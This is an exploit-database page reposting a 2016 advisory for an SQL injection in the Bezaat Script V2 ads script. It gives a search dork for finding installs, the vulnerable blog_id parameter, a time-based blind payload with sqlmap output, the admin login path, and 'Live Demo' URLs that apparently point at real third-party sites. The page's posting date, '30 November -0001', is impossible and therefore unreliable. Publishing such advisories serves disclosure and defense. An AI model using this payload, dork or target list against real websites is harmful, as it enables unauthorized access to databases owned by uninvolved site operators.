Home / os / win10

Bezaat Script V2 SQL Injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Bezaat Script V2 SQL Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>######################
# Exploit Title : Bezaat Script V2 SQL Injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : Powed by Greenit Egypt for Information Technology
# Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 15/09/2016
# video Proof : https://youtu.be/psHqU3Ldo5Q
######################
# [★] DESCRIPTION :
######################
# [+] Bezaat Script It's An Commerce Script
# [+] That Allow you To Add and Menage ads in your Website
# [+] AND an SQL Injection has been Detected in his Script Version 2
# [+] The Other Version Maybe Also infected
######################
# [★] Poc :
######################
# When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors
# http://127.0.0.1/blog/blog.php?blog_id=[SQLi]
# [id] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/blog/blog.php?blog_id=1'
######################
# [★] SQLmap PoC:
######################
# Parameter: blog_id (GET)
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind
#    Payload: blog_id=1 AND SLEEP(5)
#---
#[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable 
#[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
#[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found
#[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
#[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive
#
# GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [★] Live Demo :
######################
# http://al3ta.com/blog/blog.php?blog_id=1
# http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4
######################
# [★] Admin Dashboard :
######################
# http://127.0.0.1/admin/adminlogin.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
</BODY></HTML>

 

TOP

Malware :

Exploits :